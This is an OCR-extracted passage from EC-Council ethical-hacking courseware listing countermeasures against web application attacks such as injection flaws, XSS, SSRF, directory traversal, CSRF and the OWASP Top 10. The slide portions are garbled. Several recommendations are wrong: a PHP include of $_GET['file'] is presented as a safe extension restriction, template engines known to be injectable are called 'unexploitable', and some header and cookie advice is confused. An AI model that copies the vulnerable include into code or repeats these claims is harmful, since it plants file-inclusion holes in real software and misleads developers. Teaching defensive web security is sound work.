opt the user input to create LDAP queries. Execution of malicious LDAP queries in the
applications creates arbitrary queries that disclose information such as username and
password, thus granting attackers unauthorized access and ad min privileges.
Some countermeasures against LDAP injection attacks are as follows:
o Perform type, pattern, and domain value validation on all input data.
o Make the LDAP filter as specific as possible.

Module 14 Page 2158 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Validate and restrict the amount of data returned to the user.

o Implement tight access control on the data in the LDAP directory.
o Perform dynamic testing and source code analysis.
o Sanitize all the user-end inputs and escape any special characters.
o Avoid constructing LDAP search filters by concatenating strings.
o Use the AND filter to enforce restrictions on similar entries.
o Use LDAPS {LDAP over SSL) for encrypting and securing the communication on the
web servers.
o Establish the LDAP binding account in the environment with the least privileges
possible.
o Configure LDAP with bind authentication.
o Use SaaS-based testing services for combating LDAP injection attacks.
■ File Injection Attacks
Attackers use scripts to inject malicious files into the server, allowing them to exploit
vulnerable parameters and execute malicious code. Such an attack allows temporary
data theft and data manipulation, and it can provide attackers with persistent control of
the server.
Some countermeasures against file injection attacks are as follows:
o Strongly validate the user input.
o Consider implementing a ch root jail.
o PHP: Disable allow_url_fopen and allow_url_include in php.ini.
o PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
o PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
o Configure a separate database for the files and file paths, along with a unique
identifier/ID for each path, to avoid MITM attacks.
o Avoid the execution of files in default directories and enable the auto-download
header option for server-side communications.
o Check for PHP wrappers such as PHP filter and PHP ZIP to prevent access to sensitive
files in the local server's file system .
o Maintain a whitelist for the allowable file types and file size limits before execution.
o Employ a WAF security layer for monitoring the file injection attacks at the server.
■ Server-Side JS Injection
o Ensure that user inputs are strictly validated on the server side before processing.

Module 14 Page 2159 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Avoid using the eval() function to parse the user input.

o Never use commands having identical effects, such as setTimeOut(), setlnterval(),
and Function().
o Use JSON.parse() instead of eval() to parse the JSON input.
o Make sure to include "use strict" at the beginning of the function to enable the strict
mode inside the function scope.
o Ensure that only short alphanumeric strings are accepted as user input.
o Do not use code serialization.
■ Server-Side Include Injection

o Validate the user input and ensure that it does not include characters used in SSI
directives.
o Apply HTML encoding to the user input before executing it in the web pages.
o Ensure that directives are confined only to the web pages where they are required.
o Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to
prevent attacks.
o Implement SU Exec for the execution of pages as the file owner.
o Configure the global access. conf file using OPTIONS IncludesNOEXEC to
restrict the execution of SSI inside the directories.
■ Server-Side Template Injection

o Do not create templates from user inputs or pass user inputs as parameters into the
templates.
o Use a simple template engine such as Mustache or Python's template if the business
requirements support user-submitted templates.
o Review the template engine's documentation for hardening tips.
o Execute the template inside a sandboxed environment.
o Consider loading static template files wherever possible.
o Ensure that dynamic data are passed to a template using the template engine's
built-in functionality.
o Use predefined payloads along with in-built template expressions to examine the
server responses periodically.
o Employ highly complex and unexploitable template programming languages such as
Free Maker, Velocity, Smarty, Twig, and Jade to develop a template.
o Ensure that the template strings and variables are never combined .

Module 14 Page 2160 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Log Injection

o Pass log codes instead of messages through parameters.

o Use correct error codes and easily recognizable error messages.
o Avoid using API calls to log actions due to their visibility in browser network calls.
o Make sure to pass user IDs or publicly non-identifiable inputs as the parameters at
logging endpoints.
o Validate inputs at both the server side and the client side and sanitize and replace
the malicious characters.
o Examine the application carefully for any vulnerabilities that are used to render logs.
o Separate legitimate and fake log entries by using a prefix for every log entry with
additional metadata.
o Restrict access to physical log files.
o Control execution flow by using proper synchronization.
o Scan log injection vulnerabilities proactively with static analysis tools.
o Avoid viewing logs with tools having the ability to interpret control characters within
a file.
■ HTML Injection

o Validate all the user inputs to remove the HTML-syntax substrings from user-
supplied text.
o Check the inputs for unwanted script or HTML code such as <script></script>,
<html></html>.
o Employ security solutions that avoid false positives and detect possible injections.
o Ensure that user outputs are also encoded, examined, and validated along with user
inputs by maintaining a complete data validation process.
o Educate the developer teams along with the security teams regarding the most
prevalent HTML injection attacks and its preventive measures.
o Enable the HttpOnly flag on the server side to ensure that all the cookies generated
by the application are not available to the client user.
■ CRLF Injection

o Use any function to encode CRLF special characters and avoid using the user input in
the response headers.
o Update the version of the programming language that disallows the injection of CR
(carriage return) and LF (line feed) characters.
o Rewrite the code so that the user's content is not directly used in the HTTP stream.

Module 14 Page 2161 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Check and remove any newline strings in the content before passing it to the HTTP
header.
o Encrypt the data that is passed to the HTTP headers to hide the CR and LF codes.
o Disable unwanted headers.
o Configure XSSUrlFilter in the web application to prevent CRLF injection attacks.
o Utilize tools such as htmlcleaner (http://htmlcleaner.sourceforge.net) to remove
script tags and defend against CRLF injection attacks.
• XSS Attacks

XSS is another type of input validation attacks that target the flawed input validation
mechanism of web applications for the purpose of malicious activities. Attackers embed
a malicious script into web application input gates, which allows them to bypass the
security measures imposed by the applications.
Some countermeasures against XSS attacks are as follows:
o Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all
parameters) against a rigorous specification.
o Use testing tools extensively during the design phase to eliminate such XSS holes in
the application before it goes into use.
o Use a web application firewall to block the execution of a malicious script.
o Convert all non-alphanumeric characters into HTML character entities before
displaying the user input in search engines and forums.
o Encode the input and output and filter metacharacters in the input.
o Never trust websites that use HTTPS when it comes to XSS.
o Filtering the script output can also defeat XSS vulnerabilities by preventing them
from being transmitted to users.
o Deploy public key infrastructure (PKI) for authentication, which checks to ascertain
that the script introduced is actually authenticated.
o Implement a stringent security policy.
o Web servers, application servers, and web application environments are vulnerable
to cross-site scripting. It is difficult to identify and remove XSS flaws from web
applications. The best way to find flaws is to perform a security review of the code
and search in all the places where the input from an HTTP request comes as an
output through HTML.
o Attacker uses a variety of HTML tags to transmit a malicious JavaScript. Nessus,
Nikto, and other tools can help to some extent in scanning websites for these flaws.
If the scanning discovers a vulnerability in a website, it is highly likely to be
vulnerable to other attacks.

Module 14 Page 2162 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Review the website code to defend against XSS attacks. Check the robustness of the
code by reviewing it and comparing it against exact specifications. Check the
following areas: headers, cookies, query string form fields, and hidden fields. During
the validation process, there must be no attempt to recognize the active content,
either by removing the filter or by sanitizing it.
o There are many ways to encode known filters for active content. A "positive security
policy" is highly recommended, which specifies what is allowed and what must be
removed. Negative or attack signature-based policies are difficult to maintain, as
they are incomplete.
o Input fields should be limited to a maximum size since most script attacks need
several characters to initiate.
o Implement Content Security Policy (CSP) to prevent the browser from executing XSS
attacks.
o Escape untrusted HTTP request data built on the context in the HTML output to
resolve Reflected and Stored XSS vulnerabilities.
o Employ context-sensitive encoding when altering the browser document on the
client side, which acts against the DOM-XSS.
o Use session IDs and timestamps to prevent attackers from accessing client account
information using session cookies.
o Employ automated VAPT tools during the source-code development phase of a web
application to ensure that the application is free of known vulnerabilities.
o Use browsers that are capable of in-built security filtering from the client side to
obstruct the execution of malicious scripts.

Module 14 Page 2163 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Attack Countermeasures

Cryptographic lailures/ Sensitive
Broken Access Control
Data Exposure
8 Perform access-control checks before redirecting the 8 Do not create or use weak cryptographic algorithms
authorized user to the requested resource
e Generate encryption keys offline and store them
8 Avoid using insecure IDs to prevent attackers from
securely
guessing them
e Ensure that encrypted data stored on the disk is not
8 Provide a session timeout mechanism
easy to decrypt
8 Limit file permissions to authorized users to preve nt
misuse

Insecure Design Security Misconfiguration

8 Implement a threat modelling system to recognize
potential threats before they are exploited
8 Implement a secure development life cycle for the
development of applications according to security
standards
8 Perform application reliability checks periodical ly at each
stage of development
8 Configure all security mechanisms and dis able all unused
services
e Setup roles, permissions, and accounts and disable all
default accounts or change their defa ult passwords
e Non-SSL requests to we b pages should be redirected to
the SSL page

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Application Attack Countermeasures (Cont'd)

XML External Vulnerable and Identification and

Entity Outdated Components Authentication Failures

e Avoid processing XML input
containing a reference to an
externa l entity by a weakly
configured XML parser
e The XML unmarshaller should be
configured securely
8 Parse the document w it h a securely
config ured parser
e Configure the XML processor to use
local static DTD and disable any
declared DTD included in an XML
document
8 Regula rly check the versions of
both client-side and server-side
components as well as their
dependencies
e Continuously monitor sources such
as the National Vulnerability
Database (NVD) for vulnerabilities
in the components used
8 Apply security patches regularly
e Scan the components with security
scanners frequently
e Enforce security poli cies and best
practices for component use
8 Use SSL for authenticated parts of
the application
8 Verify whether all the users'
identities and credentials are stored
in a hashed form
8 Never submit sess ion data as part of
a GET or POST
e Apply pass phrasing with at least five
random words
8 Use a secure platform session
manager to generate long, random
sess ion identifiers

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2164 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Attack Countermeasures (Cont'd)

Software and Data Integrity Failures Insecure Deserialization

8 Enforce digital signatures to test the integrity of the source
and data
e Always use trusted repositories such as npm or Maven for
libraries and dependencies
e Check the software components for known vulnerabilities
using supply-chain security tools such as OWASP Dependency
Check
8 Validate untrusted input that is to be serialized to ensure that
seria lized data contain only trusted classes
e The deserialization of trusted data must cross a trust
boundary
e Developers must redo the architecture of their applications
8 Avoid seria lization for security-sensitive classes

Security Logging and Monitoring Failures Server-Side Request Forgery Attacks

9 Define the scope of assets covered in log monitoring to
include business-critical areas
8 Setup a minimum baseline for logging and ensure that it is
followed for all assets
8 Ensure that logs are logged with user context so that they
are traceable to specific users
9 Ensure URL stability for t he prevention of DNS rebinding and
TOCTOU attacks
8 Implement the segregation of access functionality for the
remote resources into distinct networks
8 Enable the policy of "deny by default"

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Application Attack Countermeasures (Cont'd)

e Define access rights to the protected areas of the website

Directory e Apply checks/hotfixes that prevent the exploitation of vulnerabilities such as Unicode
Traversal to affect the directory traversal

e Web servers should be regularly updated with security patches

Unvalidated e Avoid using redirects and forwards

Redirects and e If destination parameters cannot be avoided, ensure that the supplied value is valid
Forwards and authorized for the user

8 Regularly apply software patches to remove any vulnerabilities

8 Monitor network traffic
Watering
8 Secure the DNS server to prevent attackers from redirecting the site
Hole Attack
8 Analyze user behavior
8 Inspect popular websites

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2165 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Attack Countermeasures (Cont'd)

e Logoff immediately after using a web appli cation and clear the history
Cross-Site
Request e Do not al low your browser and websites to save login details
Forgery e Check the HTTP referrer header and when processing a POST, ignore URL parameters

e Do not store plai n text or weakly encrypted password in a cookie

Cookie/ e Implement timeout limits for cookies
Session
Poisoning e The authentication credentials of any cookie should be associated with an IP address

e Make logout functions availa ble

8 Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages

Web 8 Use document-centric authentication credentials that use SAML

Service 8 Use multipl e secu rity credentials such as X.509 Cert, SAML assertions and WS-Security
Attack 8 Deploy web services-capable firewalls that include SOAP and ISAPI leve l filtering
8 Configure firewa lls/IDS systems for anomaly and signature detection for web services

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Application Attack Countermeasures (Cont'd)

Clickjacking Attack JavaScript Hijacking

8 Use a server-si de method such as X-Frame-Options header
and use its options DENY, SAMEORIGIN, ALLOW -FROM URI
e Never use client-s ide methods such as Framebusting or
Framebreaking
8 Use the Content-Security-Policy (CSP) HTTP heade r
8 Use .innerText rather than .innerHTML in JavaScript to encode
the text
e Avoid using the eva l function
e Use the encoding library to safegua rd the attributes and data
elements
8 Make sure to return JSON with an obj ect externa lly

Username Enumeration Attack on Password Reset Mechanism

8 Ensure that inputs that include user identifiers produce
outputs containing only generic error messages
8 Use randomly generated data for usernames instea d of
sequential numbers
8 Use CAPTCHA for all pages that accept input to prevent
automatic data collection
8 Perform proper va lidation of random tokens and emai l links
8 Ensure all password reset UR Ls are used only once and set an
expiry time limit
e Avoid automated requests through programs and enforce
human checks usi ng the CAPTCHA

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Web Application Attack Countermeasures

• Broken Access Control
o Perform access-control checks before redirecting the authorized user to the
requested resource.
o Avoid using insecure IDs to prevent the attacker from guessing them .

Module 14 Page 2166 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

o Provide a session timeout mechanism.

o Limit file permissions to authorized users to prevent misuse.
o Avoid client-side caching mechanisms.
o Remove session tokens on the server side on user logout.
o Ensure that minimum privileges are assigned to users to perform only essential
actions.
o Enforce access control mechanisms once and re-use them throughout the
application.
o Implement deny by default, except for public resources.
o Enforce model access control that registers ownership instead of allowing the user
to modify the record.
o Perform regular audits and tests on the access controls to discover flaws and ensure
that the controls are working as expected.
o Ensure that only server-side authentication is trusted because the same controls are
implemented for all the applications, users, and services.
o Enable role-based access control (RBAC) to enhance compliance.
o Ensure that the web roots do not contain any metadata or backup files.
o Invalidate stateful session identifiers on the server after the user logs out.
o Restrict the use of the cross-origin resource sharing (CORS) protocol.
■ Cryptographic Failures/Sensitive Data Exposure

Many web applications do not properly protect sensitive data such as credit card
numbers, SSNs, and authentication credentials with appropriate encryption or hashing.
Attackers may steal or modify such weakly protected data to conduct identity theft,
credit card fraud, or other crimes.
Some countermeasures against cryptographic failures/sensitive data exposure attacks
are as follows:
o Do not create or use weak cryptographic algorithms.
o Generate encryption keys offline and store them securely.
o Ensure that encrypted data stored on the disk is not easy to decrypt.
o Use AES encryption for stored data and use TLS with HSTS (HTTP Strict Transport
Security) for incoming traffic.
o Classify the data processed, stored, or transmitted by an application and apply
controls accordingly.
o Use PCI DSS compliant tokenization or truncation to remove the data soon after its
requirement.

Module 14 Page 2167 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Use proper key management and ensure that all the keys are in place.
o Encrypt all the data in transit using TLS with Perfect Forward Secrecy (PFS) ciphers.
o Disable caching techniques for requests that contain sensitive information.
o Avoid the storage of unused vital data on the storage space to avoid exposure.
o Employ a well-crafted distinct algorithm for the security of password storage.
o Disable the auto-filling option for highly sensitive data forms.
o Employ WAF security for an additional layer of protection along with data masking
and customized rules for confidential data access at the client side.
o Avoid the use of APls that call for excessive data exposure by using global JSON
payloads.
o Use salted hashing functions such as PBKDF2 and Argon2 to store passwords.
o Use IVs and CSPRNG only when they are required to be implemented.
o Avoid using outdated hashing functions and padding techniques such as MDS, SHA-
1, PKCS vl, and PKCS vl.5.
o Use authenticated encryption techniques while encrypting the stored data to
achieve both confidentiality and data integrity.
■ Insecure Design
o Threat modelling:
• Implement a threat modeling system to detect potential threats before they are
exploited. A threat modeling system scrutinizes the security and privacy
requirements of an application during its development.

• Perform periodical assessments for every module and feature to be added in the
application.

• Design tests for flow validation and verification to defend against the listed
threats.
o Secure design:
• Implement secure design that can help in maintaining proper security in the
application through automated evaluation and testing for potential threats.

• Ensure that the application has been verified for errors. The estimations should
be analyzed and recorded . Based on the recorded estimations, appropriate
measures should be implemented.
o Secure development life cycle:
• Implement a secure development life cycle, which helps in meeting the client
requirements and developing applications according to security standards.

Module 14 Page 2168 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

• Ensure that the development and security teams maintain healthy

communication during the development of the application to implement
security- and privacy-related controls for the application.
Some additional countermeasures against insecure design issues are as follows:
o Perform application reliability checks periodically at each stage of development.
o Employ limited privileged resource access depending on the application or service.
o Differentiate the list of user accessibility scenarios into two categories based on the
use and misuse cases.
o Implement security controls layer-wise starting from the network to the system.
o Categorize the application users based on their authorization and access levels.
o Perform attack vector identification using all the security and access controls and
business risk profiling.
• Security Misconfiguration

Security misconfiguration makes web applications potentially vulnerable and may

provide attackers with access to them as well as to files and other application-
controlling functions. Insufficient transport layer protection allows attackers to obtain
unauthorized access to sensitive information as well as to perform attacks such as
account theft, phishing, and compromising admin accounts. Encrypt all communications
between the website and client to prevent attacks due to insufficient transport layer
protection.
Some countermeasures against security misconfiguration attacks are as follows:
o Configure all security mechanisms and disable all unused services.
o Setup roles, permissions, and accounts and disable all default accounts or change
their default passwords.
o Scan for the latest security vulnerabilities and apply the latest security patches.
o Non-SSL requests to web pages should be redirected to the SSL page.
o Set the 'secure' flag on all sensitive cookies.
o Configure the SSL provider to support only strong algorithms.
o Ensure that the certificate is valid and not expired, and that it matches all domains
used by the site.
o Backend and other connections should also use SSL or other encryption
technologies.
o Use different credentials for each of phase such as development, testing, and
production.
o Do not add unnecessary features, components, samples, and frameworks to the
application.

Module 14 Page 2169 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Segment the application architecture to provide individual security for each

component and tenant.
o Implement an automated process for checking configuration and settings
effectiveness in all phases.
■ XML External Entity

o Avoid processing XML input containing a reference to external entity by a weakly

configured XML parser.
o The XML unmarshaller should be configured securely.
o Parse the document with a securely configured parser.
o Configure the XML processor to use local static DTD and disable any declared DTD
included in an XML document.
o Implement whitelisting, input validation, sanitation, and filtering techniques to
prevent hostile data within the XML documents.
o Update and patch the latest XML processors and libraries.
o Ensure that the XML/XLS file upload function validates the XML using XSD validation.
o Employ security tools such as API security gateways, interactive application security
testing {IAST) tools, and web application firewalls {WAFs) to identify and stop XXE
attacks.
o Monitor the execution flow of applications by placing checkpoints in the source code
to detect and block XML processing.
■ Vulnerable and Outdated Components/Using Components with Known Vulnerabilities

o Regularly check the versions of both client-side and server-side components as well
as their dependencies.
o Continuously monitor sources such as the National Vulnerability Database {NVD) for
vulnerabilities in the components used.
o Apply security patches regularly.
o Scan the components with security scanners frequently.
o Enforce security policies and best practices for component use.
o Review all the dependencies including transitive dependencies and ensure that they
are not vulnerable.
o Maintain a regular inventory of the versions of both client-side and server-side
components regularly.
o Obtain components from official sources and accept only signed packages.
o Use software composition analysis (SCA) processes to inspect source code and
monitor open-source vulnerabilities and restrictions.

Module 14 Page 2170 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Check updates for subcomponents along with the main components.

o Wrap up the required components with security wrappers to safeguard any
vulnerable aspects of those components.
o Check for unnecessary dependencies, components, and files and remove them.
• Identification and Authentication Failures/Broken Authentication and Session
Management
Flaws in authentication and session management application functions allow attackers
to gain passwords, keys, and session tokens or exploit other implementation
vulnerabilities to gain other users' credentials.
Session cookies are destined for client IPs by delivering a validation cookie, which
includes a cryptographic token that verifies that the client IP is the one to which the
session token was issued. Therefore, to perform the session attack, the attacker must
steal the IP address of the target user.
Some countermeasures against broken authentication and session management attacks
are as follows:
o Use SSL for all authenticated parts of the application.
o Verify whether all the users' identities and credentials are stored in a hashed form.
o Never submit session data as part of a GET or POST.
o Apply pass phrasing with at least five random words.
o Limit the login attempts and lock the account for a specific period after a certain
number of failed attempts.
o Use a secure platform session manager to generate long, random session identifiers
for secure session development.
o Implement multi-factor authentication mechanisms to prevent guessing, credential
stuffing, and brute-forcing.
o Make sure to secure passwords with a cryptographic password hash algorithm or
tools such as bcrypt, scrypt, or Argon2.
o Make sure to check weak passwords against a list of the top bad passwords .
o Log authentication failures and send alerts whenever probable attacks are detected.
o Check URLs for insecure information such as session IDs while sharing the URLs to
avoid URL rewriting attacks.
o Use proper session management procedures for login and logout actions and ensure
that the session value is invalid after logging out.
o Ensure that API gateways, credential recovery, and registration security are
enhanced against enumeration attacks.

Module 14 Page 2171 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Login failure response should not display which part of the credential is incorrect
and simply respond with an "invalid username and/or password" message.
o Implement identity and access management (1AM) and enforce secure password
policies to strengthen user account passwords.
■ Software and Data Integrity Failures

o Enforce digital signatures or related techniques to test the integrity of the source
and software and data.
o Always use trusted repositories such as npm and Maven for libraries and
dependencies.
o Check the software components for known vulnerabilities using supply-chain
security tools such as OWASP Dependency Check or OWASP CycloneDX.
o Regularly audit the software code and configuration to reduce the likelihood of
introducing malicious code into the software pipeline.
o Implement appropriate isolation, configuration, and access control for the data
flowing through the build and deploy processes of the Cl/CD pipeline.
■ Insecure Deserialization

o Validate untrusted input that is to be serialized to ensure that serialized data

contains only trusted classes.
o The deserialization of trusted data must cross a trust boundary.
o Developers must redo the architecture of their applications.
o Avoid serialization for security-sensitive classes.
o Guard sensitive data during deserialization.
o Filter untrusted serial data.
o Enforce duplicate security manager checks in a class during serialization and
deserialization.
o Understand the security permissions given to serialization and deserialization.
o Implement integrity checks or encryption of the serialized objects to prevent data
modification or hostile object creation .
o Isolate code that deserializes so that it runs in very-low-privileged environments.
o Log the deserial ization exceptions and failures so that the incoming type is not the
same as the expected type; otherwise, it throws an exception.
o Check and limit the network activity to and from containers and servers that
perform deserialization.
o Monitor the process of deserialization to detect constant deserialization by a user.
o Avoid the deserialization of domain objects.

Module 14 Page 2172 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

o Always perform integrity checks before starting deserialization.

o Use language-agnostic methods such as JSON or XML, rather than generic
deserialization features.
• Security Logging and Monitoring Failures/Insufficient Logging and Monitoring

o Define the scope of assets covered in log monitoring to include business-critical

areas.
o Setup a minimum baseline for logging and ensure that it is followed for all assets.
o Ensure that logs are logged with user context so that they are traceable to specific
users.
o Ascertain what to log and what log to look for through proactive incident
identification.
o Perform sanitization on all event data to prevent log injection attacks.
o Implement a common logging mechanism for the whole application and use
effective incident response.
o Ensure all logins, access control failures, and input validation failures can be logged
with the necessary user context to identify suspicious accounts.
o Make sure that high-value transactions consist of an audit trail with integrity
controls to prevent tampering of the databases such as append-only database
tables.
o Maintain secured backup servers for storing log files as a backup recovery plan.
o Employ unified log monitoring and management platforms such as Nlog and OWASP
AppSensor with advanced features such as continuous visual monitoring and
alarming systems.
o Employ a time synchronization model for networks to maintain synchronized event
logging in real-time analysis.
o Analyze suspicious activities such as strange device shutdown, restarting, and
logging.
o Include partial or nearly failed calls, such as the 403 Forbidden error, or any type of
user input validation errors into the checklist during log monitoring.
o Employ the latest technologies such as Al-powered log monitoring and abnormality
detection and IDS/IPS for improving the monitoring and management of log events.
o Ensure that all the log files produced must be in global format s to facilitat e
synchronization with all types of log management systems.
o Secure the log files by encoding them during transmission to ensure that the log files
are protected from injection and MITM attacks.

Module 14 Page 2173 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Server-Side Request Forgery Attacks

o Enable authentication and sanitization for all the client-side data.

o Permit the URL schemas such as https:// used by the application and restrict the
unused ones.
o Ensure that no raw response is sent to the client side.
o Do not allow the redirection of HTTP.
o Ensure URL stability for the prevention of DNS rebinding and time-of-check to time-
of-use (TOCTOU) attacks.
o Implement the segregation of access functionality for the remote resources into
distinct networks .
o Enable the policy of "deny by default" or implement access-control rules to block all
intra net traffic excluding the essential traffic.
o Use VPN and other encryption techniques on the frontend systems to enhance
security.
o Enable the whitelisting of the domains or addresses accessed by the application.
o Allow access only to the authorized file extensions by hard-coding the allowed
extensions. The following is an example:
<?php
include($_GET['file'] I. html I ) ;

?>
o Configure the systems to log certain changes within the server and track the dates of
file changes.
o Enforce a next-generation web application firewall (NGWAF) to enhance the security
against SSRF attacks.
■ Directory Traversal

Directory traversal enables attackers to exploit HTTP, gain access to restricted

directories, and execute commands outside the web server's root directory. Developers
must configure web applications and their servers with appropriate file and directory
permissions to avoid directory traversal vulnerabilities.
Some countermeasures against directory traversal attacks are as follows:
o Define access rights to the protected areas of the website.
o Apply checks/hotfixes that prevent exploitation of vulnerabilities such as Unicode,
which affect the directory traversal.
o Web servers should be updated with security patches in a timely manner.

Module 14 Page 2174 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Validate the user input before processing by comparing it with the whitelist and
verify that the input contains only purely alphanumeric characters.
o Append the input of the application to the base directory and use the platform
filesystem API to canonicalize the path.
o Use an advanced content management system (CMS) for handing several
documents.
o Host documents on a separate file server or cloud storage to prevent mixing of
public and sensitive documents.
o Properly sanitize the file names coming from HTTP requests.
o Restrict file names to a list of known good characters and ensure that any references
to files use only these characters.
o Do not rely on user input to call file-system APls.
o Process URI requests that do not lead to file requests.
o Use a chroot jail for Unix-based systems.
■ Unvalidated Redirects and Forwards

In general, web applications redirect and forward users to other pages and websites.
Therefore, if a web application does not validate the data, then attackers can redirect
users to malicious websites or use forwarding to access unauthorized pages. Therefore,
to prevent such attacks, it is best not to allow users to directly supply parameters to
redirect and forward in web application logic.
Some countermeasures against unvalidated redirects and forwards attacks are as
follows:
o Avoid using redirects and forwards.
o If the destination parameters cannot be avoided, ensure that the supplied value is
valid and authorized for the user.
o Avoid allowing URL as a user input for the destination and validate the URL.
o Sanitize the input by generating a list of trusted URLs that includes a list of hosts or
regex.
o Implement meta refresh in the page, as it can use hardcoded HTML to automatically
redirect users to another page.
o Implement token ID verification for redirecting web pages.
o Implement the use of absolute and relative URLs during redirection .
o Educate users to identify the malicious sites and common stuffing methods used by
attackers.
o Enable notification pop-up pages while redirecting users to a new web page.

Module 14 Page 2175 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Remove search engines from the scripts of redirects to prevent users from being
tricked into clicking unsafe links through search results.
o Apply internal redirects to enable minimum filtering to limit the redirects toward a
local subdomain.
■ Watering Hole Attack

o Regularly apply software patches to remove any vulnerabilities.

o Monitor network traffic.
o Secure the DNS server to prevent attackers from redirecting the site to a new
location.
o Analyze user behavior.
o Inspect popular websites.
o Use browser plug-ins that block HTTP redirects.
o Disable third-party content such as advertising services, which track user activities.
o Make sure to hide online activities with a VPN and enable the browser's private
browsing feature.
o Make sure to run the web browser in a virtual environment to limit access to the
local system.
o Use web filters to detect attacks on websites and prevent browsers from accessing
infected pages.
o Restrict users from granting additional permissions to websites.
o Employ an email solution that can apply similar dynamic malware analysis to protect
against targeted email traps.
o Utilize micro-virtualization, which is difficult to bypass.
■ Cross-Site Request Forgery

Using a CSRF attack, attackers lure a user's browser into sending a fake HTTP request,
including the user session cookie and other authentication information, to a legitimate
(vulnerable) web application to perform malicious activities.
Some countermeasures against cross-site request forgery attacks are as follows:
o Logoff immediately after using a web application and clear the history.
o Do not allow your browser and website to save login details.
o Check the HTTP Referrer header and when processing a POST, ignore URL
parameters.
o Use referer headers such as HttpOnly flag that sends an X-Requested-With custom
header using jQuery.

Module 14 Page 2176 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

o Use CSRF tokens such as nonce tokens that are submitted through the hidden form
field to avoid illegal access.
o Employ security frameworks such as Joomla, Spring, Struts, Ruby on Rails, and .NET,
which have in-built security features against CSRF.
o Maintain a per-request token assignment strategy, rather than per-session token
assignment.
■ Cookie/Session Poisoning
Browsers use cookies to maintain a session state. They also contain sensitive, session-
specific data (e.g., user IDs, passwords, account numbers, links to shopping cart
contents, supplied private information, and session IDs). Attackers engage in
cookie/session poisoning by modifying the data in the cookie to gain escalated access or
maliciously affect a user session. Developers must hence follow secure coding practices
to secure web applications against such poisoning attacks. They must use proper
session-token generation mechanisms to issue random session IDs.
Some countermeasures against cookie/session poisoning attacks are as follows:
o Do not store plaintext or weakly encrypted passwords in cookies.
o Implement cookie timeout.
o The authentication credentials of any cookie should be associated with an IP
address.
o Make logout function s available.
o Validate all the cookie values to ensure that they are well-formed and correct.
